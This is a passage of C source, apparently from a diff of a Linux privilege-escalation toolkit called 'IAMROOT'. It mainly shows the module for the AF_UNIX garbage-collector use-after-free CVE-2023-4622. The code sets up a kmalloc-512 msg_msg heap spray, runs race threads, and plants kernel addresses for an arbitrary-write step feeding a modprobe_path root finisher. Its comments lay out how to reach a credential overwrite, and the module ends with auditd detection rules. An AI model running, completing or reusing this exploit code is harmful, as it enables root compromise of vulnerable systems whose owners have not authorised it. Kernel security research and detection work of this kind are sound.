if (queues[i] >= 0) msgctl(queues[i], IPC_RMID, NULL);
}
}
/* Read /proc/slabinfo for kmalloc-512 active count. Used as the
* primary empirical witness: a successful UAF + refill perturbs
* this counter in a way that's distinguishable from idle drift. */
static long slab_active_kmalloc_512(void)
{
FILE *f = fopen("/proc/slabinfo", "r");
if (!f) return -1;
char line[512];
long active = -1;
while (fgets(line, sizeof line, f)) {
if (strncmp(line, "kmalloc-512 ", 12) == 0) {
char name[64];
long act = 0, num = 0;
if (sscanf(line, "%63s %ld %ld", name, &act, &num) >= 2) {
active = act;
}
break;
}
}
fclose(f);
return active;
}
/* ---- Arb-write primitive (FALLBACK depth) ------------------------
*
* The shared modprobe_path finisher calls back here once per kernel
* write. For AF_UNIX GC race we cannot deliver a deterministic
* arb-write — the underlying race wins on a small fraction of runs
* even with a 30 s budget, and even when the race wins our spray-only
* groom has nowhere near the precision of Lin Ma's multi-stage public
* PoC (which crafts a fake unix_sock whose `peer` pointer steers a
* subsequent SCM_RIGHTS dispatch into the kaddr we want written).
*
* Honest depth: FALLBACK. Each invocation:
* 1. Re-seeds the kmalloc-512 spray with payloads tagged with
* `kaddr` packed at strided offsets (so wherever the UAF reclaim
* lands attacker-controlled bytes inside the freed unix_sock,
* our kaddr appears at the field offset).
* 2. Re-runs the race threads for the extended full-chain budget.
* 3. Returns 0 — we cannot in-process verify the write landed. The
* shared finisher's 3 s sentinel file check is the empirical
* arbiter: on the overwhelmingly common no-land outcome it
* returns EXPLOIT_FAIL gracefully. */
struct af_unix_gc_arb_ctx {
int *queues;
int n_queues;
int arb_calls;
};
static int af_unix_gc_reseed_kaddr_spray(int queues[AFUG_SPRAY_QUEUES],
uintptr_t kaddr,
const void *buf, size_t len)
{
struct ipc_payload p;
memset(&p, 0, sizeof p);
p.mtype = 0x52; /* 'R' — arb-write reseed (distinct from groom 0x55) */
memset(p.buf, 0x52, sizeof p.buf);
memcpy(p.buf, "IAMU4ARB", 8);
/* Plant kaddr at strided slots so wherever the kernel's UAF
* follows a ptr in the refilled chunk, one of these is read.
* unix_sock has multiple pointer fields (peer, link, scm_stat,
* etc.) — strided coverage hits whichever one the UAF dispatch
* dereferences. */
for (size_t off = 0x10; off + sizeof(uintptr_t) <= sizeof p.buf;
off += 0x18) {
memcpy(p.buf + off, &kaddr, sizeof(uintptr_t));
}
/* Caller's bytes immediately after the cookie so any path that
* reads payload data (rather than a chased pointer) finds the
* requested write contents inline. */
size_t copy = len;
if (copy > sizeof p.buf - 16) copy = sizeof p.buf - 16;
if (buf && copy) memcpy(p.buf + 8 + sizeof(uintptr_t), buf, copy);
int touched = 0;
for (int i = 0; i < AFUG_SPRAY_QUEUES && touched < 6; i++) {
if (queues[i] < 0) continue;
if (msgsnd(queues[i], &p, sizeof p.buf, IPC_NOWAIT) == 0) touched++;
}
return touched;
}
static int af_unix_gc_arb_write(uintptr_t kaddr,
const void *buf, size_t len,
void *ctx_v)
{
struct af_unix_gc_arb_ctx *c = (struct af_unix_gc_arb_ctx *)ctx_v;
if (!c || !c->queues || c->n_queues == 0) return -1;
c->arb_calls++;
fprintf(stderr, "[*] af_unix_gc: arb_write attempt #%d kaddr=0x%lx len=%zu "
"(FALLBACK — race-dependent)\n",
c->arb_calls, (unsigned long)kaddr, len);
int seeded = af_unix_gc_reseed_kaddr_spray(c->queues, kaddr, buf, len);
if (seeded == 0) {
fprintf(stderr, "[-] af_unix_gc: arb_write: kaddr-tagged reseed produced 0 msgs\n");
} else {
fprintf(stderr, "[*] af_unix_gc: arb_write: reseeded %d msg_msg slots\n",
seeded);
}
/* Re-run the race with the extended budget. */
atomic_store(&g_race_running, 1);
atomic_store(&g_thread_a_iters, 0);
atomic_store(&g_thread_b_iters, 0);
atomic_store(&g_thread_a_errs, 0);
pthread_t ta, tb;
bool a_ok = pthread_create(&ta, NULL, race_thread_a, NULL) == 0;
bool b_ok = a_ok &&
pthread_create(&tb, NULL, race_thread_b, NULL) == 0;
if (!a_ok || !b_ok) {
atomic_store(&g_race_running, 0);
if (a_ok) pthread_join(ta, NULL);
fprintf(stderr, "[-] af_unix_gc: arb_write: pthread_create failed\n");
return -1;
}
sleep(AFUG_RACE_FULLCHAIN_BUDGET);
atomic_store(&g_race_running, 0);
pthread_join(ta, NULL);
pthread_join(tb, NULL);
uint64_t a_iters = atomic_load(&g_thread_a_iters);
uint64_t b_iters = atomic_load(&g_thread_b_iters);
fprintf(stderr, "[*] af_unix_gc: arb_write: extended race A=%llu B=%llu\n",
(unsigned long long)a_iters,
(unsigned long long)b_iters);
/* Cannot in-process verify the write — let the finisher's sentinel
* arbitrate. */
return 0;
}
/* ---- Exploit driver ---------------------------------------------- */
static iamroot_result_t af_unix_gc_exploit_linux(const struct iamroot_ctx *ctx)
{
/* 1. Refuse-gate: re-call detect() and short-circuit. */
iamroot_result_t pre = af_unix_gc_detect(ctx);
if (pre == IAMROOT_OK) {
fprintf(stderr, "[+] af_unix_gc: kernel not vulnerable; refusing exploit\n");
return IAMROOT_OK;
}
if (pre != IAMROOT_VULNERABLE) {
fprintf(stderr, "[-] af_unix_gc: detect() says not vulnerable; refusing\n");
return pre;
}
if (geteuid() == 0) {
fprintf(stderr, "[i] af_unix_gc: already root — nothing to escalate\n");
return IAMROOT_OK;
}
/* Full-chain pre-check: resolve offsets BEFORE the race fork. If
* modprobe_path is unresolvable we refuse here rather than running
* a 30 s race that has no finisher to call. */
struct iamroot_kernel_offsets off;
bool full_chain_ready = false;
if (ctx->full_chain) {
memset(&off, 0, sizeof off);
iamroot_offsets_resolve(&off);
if (!iamroot_offsets_have_modprobe_path(&off)) {
iamroot_finisher_print_offset_help("af_unix_gc");
fprintf(stderr, "[-] af_unix_gc: --full-chain requested but "
"modprobe_path offset unresolved; refusing\n");
fprintf(stderr, "[i] af_unix_gc: even with offsets, race-win rate is\n"
" a small fraction per run — see module header.\n");
return IAMROOT_EXPLOIT_FAIL;
}
iamroot_offsets_print(&off);
full_chain_ready = true;
fprintf(stderr, "[i] af_unix_gc: --full-chain ready — race budget extends\n"
" to %d s. RELIABILITY remains race-dependent on a real\n"
" vulnerable kernel. The finisher's 3 s sentinel timeout\n"
" catches no-land outcomes gracefully.\n",
AFUG_RACE_FULLCHAIN_BUDGET);
}
if (!ctx->json) {
fprintf(stderr, "[*] af_unix_gc: forking exploit child (SCM_RIGHTS cycle "
"race harness%s)\n",
ctx->full_chain ? " + full-chain finisher" : "");
}
signal(SIGPIPE, SIG_IGN);
pid_t child = fork();
if (child < 0) { perror("fork"); return IAMROOT_TEST_ERROR; }
if (child == 0) {
/* 2. Groom: pre-populate kmalloc-512 with msg_msg payloads
* BEFORE the race so the freed unix_sock slot gets recycled
* with attacker-controlled bytes when the bug fires. */
int queues[AFUG_SPRAY_QUEUES] = {0};
for (int i = 0; i < AFUG_SPRAY_QUEUES; i++) queues[i] = -1;
int n_queues = spray_kmalloc_512(queues);
if (n_queues == 0) {
fprintf(stderr, "[-] af_unix_gc: msg_msg spray produced 0 queues "
"(sysv IPC restricted?)\n");
_exit(23);
}
if (!ctx->json) {
fprintf(stderr, "[*] af_unix_gc: kmalloc-512 spray seeded %d queues x %d msgs\n",
n_queues, AFUG_SPRAY_PER_QUEUE);
}
long slab_pre = slab_active_kmalloc_512();
/* 3. Run the race for a bounded time budget. */
atomic_store(&g_race_running, 1);
atomic_store(&g_thread_a_iters, 0);
atomic_store(&g_thread_b_iters, 0);
atomic_store(&g_thread_a_errs, 0);
pthread_t ta, tb;
if (pthread_create(&ta, NULL, race_thread_a, NULL) != 0 ||
pthread_create(&tb, NULL, race_thread_b, NULL) != 0) {
fprintf(stderr, "[-] af_unix_gc: pthread_create failed\n");
atomic_store(&g_race_running, 0);
drain_kmalloc_512(queues);
_exit(24);
}
sleep(AFUG_RACE_TIME_BUDGET);
atomic_store(&g_race_running, 0);
pthread_join(ta, NULL);
pthread_join(tb, NULL);
long slab_post = slab_active_kmalloc_512();
uint64_t a_iters = atomic_load(&g_thread_a_iters);
uint64_t b_iters = atomic_load(&g_thread_b_iters);
uint64_t a_errs = atomic_load(&g_thread_a_errs);
/* 4. Empirical witness breadcrumb. */
FILE *log = fopen("/tmp/iamroot-af_unix_gc.log", "w");
if (log) {
fprintf(log,
"af_unix_gc race harness (CVE-2023-4622):\n"
" thread_a_iters = %llu (SCM_RIGHTS cycle + close)\n"
" thread_b_iters = %llu (SCM_RIGHTS perturb)\n"
" thread_a_errors = %llu (socketpair / send failures)\n"
" slab_kmalloc512_pre = %ld\n"
" slab_kmalloc512_post = %ld\n"
" slab_delta = %ld\n"
" spray_queues = %d\n"
" spray_per_queue = %d\n"
" race_budget_secs = %d\n"
"Note: this run did NOT attempt cred overwrite. The bug is a\n"
"slab UAF with no in-process leak primitive; per-kernel offsets\n"
"for unix_sock layout aren't baked. See module .c for the\n"
"continuation roadmap (Lin Ma fake-peer plant).\n",
(unsigned long long)a_iters,
(unsigned long long)b_iters,
(unsigned long long)a_errs,
slab_pre, slab_post,
(slab_post >= 0 && slab_pre >= 0) ? (slab_post - slab_pre) : 0,
n_queues, AFUG_SPRAY_PER_QUEUE,
AFUG_RACE_TIME_BUDGET);
fclose(log);
}
if (!ctx->json) {
fprintf(stderr, "[*] af_unix_gc: race ran for %ds — A=%llu B=%llu A_errs=%llu\n",
AFUG_RACE_TIME_BUDGET,
(unsigned long long)a_iters,
(unsigned long long)b_iters,
(unsigned long long)a_errs);
fprintf(stderr, "[*] af_unix_gc: kmalloc-512 active: pre=%ld post=%ld\n",
slab_pre, slab_post);
}
/* Hold the spray briefly so the kernel observes refilled slots
* during any in-flight RCU grace periods that started during
* the race. */
usleep(200 * 1000);
/* 5. --full-chain finisher (FALLBACK depth). */
if (full_chain_ready) {
struct af_unix_gc_arb_ctx arb_ctx = {
.queues = queues,
.n_queues = AFUG_SPRAY_QUEUES,
.arb_calls = 0,
};
int fr = iamroot_finisher_modprobe_path(&off,
af_unix_gc_arb_write,
&arb_ctx,
!ctx->no_shell);
FILE *fl = fopen("/tmp/iamroot-af_unix_gc.log", "a");
if (fl) {
fprintf(fl, "full_chain finisher rc=%d arb_calls=%d\n",
fr, arb_ctx.arb_calls);
fclose(fl);
}
drain_kmalloc_512(queues);
if (fr == IAMROOT_EXPLOIT_OK) _exit(34); /* root popped */
_exit(35); /* finisher ran, no land */
}
drain_kmalloc_512(queues);
/* 6. Continuation roadmap — what would land EXPLOIT_OK.
*
* TODO(leak): replace a spray queue with msgrcv(..., MSG_COPY|
* IPC_NOWAIT) probes and scan the returned buffer for non-
* cookie bytes. A freed unix_sock that's refilled by msg_msg
* after a partial overwrite would leak kernel pointers
* (peer, scm_stat, list_node prev/next) into the readback.
* Recover {kbase, init_task} via that leak.
*
* TODO(write): with kbase known, plant a fake unix_sock
* whose `peer` pointer references &current->cred — the
* next SCM_RIGHTS dispatch through the freed slot writes
* a controlled value into that location. Crafting the
* fake unix_sock requires offset of unix_sock fields per
* kernel build (different across LTS branches).
*
* TODO(overwrite): land &init_cred over current->cred so
* the next permission check sees uid==0.
*
* None of these are implemented today. Exit 30 = "trigger
* ran cleanly, no escalation".
*/
_exit(30);
}
/* PARENT */
int status = 0;
pid_t w = waitpid(child, &status, 0);
if (w < 0) { perror("waitpid"); return IAMROOT_TEST_ERROR; }
if (WIFSIGNALED(status)) {
int sig = WTERMSIG(status);
if (!ctx->json) {
fprintf(stderr, "[!] af_unix_gc: race child killed by signal %d "
"(consistent with UAF firing under KASAN)\n", sig);
fprintf(stderr, "[~] af_unix_gc: empirical signal recorded; no cred\n"
" overwrite primitive — NOT claiming EXPLOIT_OK.\n"
" See /tmp/iamroot-af_unix_gc.log + dmesg for witnesses.\n");
}
return IAMROOT_EXPLOIT_FAIL;
}
if (!WIFEXITED(status)) {
fprintf(stderr, "[-] af_unix_gc: child terminated abnormally (status=0x%x)\n",
status);
return IAMROOT_EXPLOIT_FAIL;
}
int rc = WEXITSTATUS(status);
if (rc == 23 || rc == 24) return IAMROOT_PRECOND_FAIL;
if (rc == 34) {
if (!ctx->json) {
fprintf(stderr, "[+] af_unix_gc: --full-chain finisher reported "
"EXPLOIT_OK (race won + write landed)\n");
}
return IAMROOT_EXPLOIT_OK;
}
if (rc == 35) {
if (!ctx->json) {
fprintf(stderr, "[~] af_unix_gc: --full-chain finisher ran; race did not\n"
" win + land within budget (expected outcome on most\n"
" runs — race wins are a fraction of a percent).\n");
}
return IAMROOT_EXPLOIT_FAIL;
}
if (rc != 30) {
fprintf(stderr, "[-] af_unix_gc: child failed at stage rc=%d\n", rc);
return IAMROOT_EXPLOIT_FAIL;
}
if (!ctx->json) {
fprintf(stderr, "[*] af_unix_gc: race harness ran to completion.\n");
fprintf(stderr, "[~] af_unix_gc: read/write/cred-overwrite primitives NOT\n"
" implemented (per-kernel offsets; see module .c TODO\n"
" blocks). Returning EXPLOIT_FAIL per verified-vs-claimed.\n");
}
return IAMROOT_EXPLOIT_FAIL;
}
#endif /* __linux__ */
static iamroot_result_t af_unix_gc_exploit(const struct iamroot_ctx *ctx)
{
if (!ctx->authorized) {
fprintf(stderr, "[-] af_unix_gc: --exploit requires --i-know; refusing\n");
return IAMROOT_PRECOND_FAIL;
}
#ifdef __linux__
return af_unix_gc_exploit_linux(ctx);
#else
(void)ctx;
fprintf(stderr, "[-] af_unix_gc: Linux-only module; cannot run on this host\n");
return IAMROOT_PRECOND_FAIL;
#endif
}
/* ---- Cleanup ----------------------------------------------------- */
static iamroot_result_t af_unix_gc_cleanup(const struct iamroot_ctx *ctx)
{
if (!ctx->json) {
fprintf(stderr, "[*] af_unix_gc: cleaning up race-harness breadcrumb\n");
}
if (unlink("/tmp/iamroot-af_unix_gc.log") < 0 && errno != ENOENT) {
/* harmless */
}
/* Race threads + msg queues live inside the now-exited child;
* nothing else to drain. */
return IAMROOT_OK;
}
/* ---- Detection rules --------------------------------------------- */
static const char af_unix_gc_auditd[] =
"# AF_UNIX GC race UAF (CVE-2023-4622) — auditd detection rules\n"
"# The trigger is a tight loop of socketpair(AF_UNIX) + sendmsg with\n"
"# SCM_RIGHTS passing inflight fds, followed by close. Each call is\n"
"# benign — flag the *frequency* by correlating these keys with a\n"
"# subsequent KASAN message in dmesg.\n"
"-a always,exit -F arch=b64 -S socketpair -F a0=0x1 -k iamroot-afunixgc-pair\n"
"-a always,exit -F arch=b64 -S sendmsg -k iamroot-afunixgc-sendmsg\n"
"-a always,exit -F arch=b64 -S msgsnd -k iamroot-afunixgc-spray\n";
const struct iamroot_module af_unix_gc_module = {
.name = "af_unix_gc",
.cve = "CVE-2023-4622",
.summary = "AF_UNIX garbage-collector race UAF (Lin Ma) — kmalloc-512 slab UAF",
.family = "af_unix",
.kernel_range = "K < 6.5; backports: 4.14.326 / 4.19.295 / 5.4.257 / 5.10.197 / 5.15.130 / 6.1.51",
.detect = af_unix_gc_detect,
.exploit = af_unix_gc_exploit,
.mitigate = NULL,
.cleanup = af_unix_gc_cleanup,
.detect_auditd = af_unix_gc_auditd,
.detect_sigma = NULL,
.detect_yara = NULL,
.detect_falco = NULL,
};
void iamroot_register_af_unix_gc(void)
{
iamroot_register(&af_unix_gc_module);
}
@@ -0,0 +1,12 @@
/*
* af_unix_gc_cve_2023_4622 — IAMROOT module registry hook
*/
#ifndef AF_UNIX_GC_IAMROOT_MODULES_H
#define AF_UNIX_GC_IAMROOT_MODULES_H
#include "../../core/module.h"
extern const struct iamroot_module af_unix_gc_module;
#endif
File diff suppressed because it is too large Load Diff
@@ -0,0 +1,12 @@
/*
* nft_fwd_dup_cve_2022_25636 — IAMROOT module registry hook
*/
#ifndef NFT_FWD_DUP_IAMROOT_MODULES_H
#define NFT_FWD_DUP_IAMROOT_MODULES_H
#include "../../core/module.h"
extern const struct iamroot_module nft_fwd_dup_module;
#endif
File diff suppressed because it is too large Load Diff
@@ -0,0 +1,12 @@
/*
* nft_payload_cve_2023_0179 IAMROOT module registry hook
*/
#ifndef NFT_PAYLOAD_IAMROOT_MODULES_H
#define NFT_PAYLOAD_IAMROOT_MODULES_H
#include "../../core/module.h"
extern const struct iamroot_module nft_payload_module;
#endif
File diff suppressed because it is too large Load Diff
@@ -0,0 +1,12 @@
/*
* nft_set_uaf_cve_2023_32233 IAMROOT module registry hook
*/
#ifndef NFT_SET_UAF_IAMROOT_MODULES_H
#define NFT_SET_UAF_IAMROOT_MODULES_H
#include "../../core/module.h"
extern const struct iamroot_module nft_set_uaf_module;
#endif